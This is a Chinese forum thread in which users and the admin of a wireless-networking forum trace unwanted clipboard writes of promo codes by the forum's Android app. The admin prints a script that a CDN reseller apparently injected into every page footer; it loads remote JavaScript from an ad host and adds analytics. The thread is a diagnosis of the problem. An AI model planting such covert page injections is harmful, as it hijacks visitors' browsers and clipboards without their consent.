QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
楼主: 一碗泡面A

恩山无线论坛app不要脸行为

ink 发表于 2018-11-3 14:23
很久以前就试过了,的确没有;今晚回去再试一下,不管怎样今晚都会尝试或者预防这类事情

我的剪切板,和楼上的一个人的一模一样,总不能是我自己无聊把红包码一个一个复制到剪切板上的吧

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

我的恩山、我的无线 The best wifi forum is right here.

我的嗯山app没有这种情况。只有淘宝最讨厌。一开机就会自动跳出淘宝app。而且淘宝app我特地从官网扫描下载的。
我的恩山、我的无线 The best wifi forum is right here.

我也经常碰到这种情况,但我觉得不是恩山干的。

我安卓一直都这样,只有打开恩山就会复杂,以前是红包,现在是贷款

我以为是斐讯

ink 发表于 2018-11-3 14:12
我再说一下:本论坛绝对没有做这样的捆绑,本人用的苹果app,绝对无,因为没有安卓手机所以无法测试,但你 ...

我把APP的一些推送活动和广播接收器禁用之后就不会出现写入剪贴板的动作了,说明APP里没有剪贴板写入动作。而是集成的一些推送API或者其他服务执行了这个流氓的行为,建议更换推送或者统计SDK。附上一张图。辛苦管理了!
大家不要喷恩山APP了,而是恩山集成的SDK有问题。

本帖子中包含更多资源

这个监测功能强大,请教一下,安卓手机内置sd卡根目录,总是有.td-3 .tdck之类的文件,还有其他很多目录里都有,不知道是什么APP干的,有办法监测到吗?  详情 回复 发表于 2018-11-4 16:24

评分

ink + 50

mengzhilian07 发表于 2018-11-3 20:42
我把APP的一些推送活动和广播接收器禁用之后就不会出现写入剪贴板的动作了,说明APP里没有剪贴板写入动作 ...

这个监测功能强大,请教一下,安卓手机内置sd卡根目录,总是有.td-3 .tdck之类的文件,还有其他很多目录里都有,不知道是什么APP干的,有办法监测到吗?

spring1 发表于 2018-11-4 16:24
这个监测功能强大,请教一下,安卓手机内置sd卡根目录,总是有.td-3 .tdck之类的文件,还有其他很多目录 ...

你用ES文件浏览器试试,什么应用生成了什么文件都可以显示在这个软件首页。

mengzhilian07 发表于 2018-11-3 20:42
我把APP的一些推送活动和广播接收器禁用之后就不会出现写入剪贴板的动作了,说明APP里没有剪贴板写入动作 ...

老大,恳请再试一下,我这边刚才试了一下已经没有了。

问题出在百度云加速的代理商那里,令人感到恶心的,唉,我从昨天研究到现在总算发现问题所在,现在已经通知她们去掉了代码,那串强行加载在恩山网站所有页面底部的代码如下:

1. <script type="text/javascript" > var _hmt = _hmt || [];
  2.     (function() {
  3.       var id = document.getElementById('ad_186d8');
  4.      if (!id) {
  5.           return;
  6.       }
  7.       var script = document.createElement('script')
  8.       script.src = 'http://r.zlongad.com/site/js?placeId=186d8'
  9.       
  10.       var div = document.createElement('div');
  11.       id.appendChild(div);
  12.       div.appendChild(script);
  13.       var hm = document.createElement("script");
  14.       hm.src = "https://hm.baidu.com/hm.js?ad743f1a218963fb11110bc38f2a80a8";
  15.       var s = document.getElementsByTagName("script")[0];
  16.       s.parentNode.insertBefore(hm, s);
  17.   })() </script>
复制代码

这种行为犹如盗窃行为,唉,应该是从今年6月中旬直到今天!!!

我今晚已经通知她们去掉代码,麻烦再试一下,如果还有请告诉我,谢谢!!!

ink 发表于 2018-11-4 22:19

问题出在百度云加速的代理商那里,令人感到恶心 ...

原来是注入foot了。晚上7点左右我测试还有写入剪贴板,现在没有了。他这个很聪明,不是每次打开APP都写入,应该是一天写入一次,或者剪贴板有相同的就不再写入。明天晚上我再试试。如果是CDN加速可能存在缓存继续写入,多测几天试试。

这下给坛友解释清楚就好了,有必要的话发个公告也行。

继续测试,又写入了,昨晚特意重新安装了APP。

本帖子中包含更多资源

mengzhilian07 发表于 2018-11-5 07:52
继续测试,又写入了,昨晚特意重新安装了APP。

不知道是哪串代码,我看了页面的源码,没有发现类似的。

这个我也不知道了,应该不是这个,这个看起来像身份信息?联系一下百度云加速,叫他帮忙排查一下。  详情 回复 发表于 2018-11-5 09:59

ink 发表于 2018-11-5 09:47
不知道是哪串代码,我看了页面的源码,没有发现类似的。

这个我也不知道了,应该不是这个,这个看起来像身份信息?联系一下百度云加速,叫他帮忙排查一下。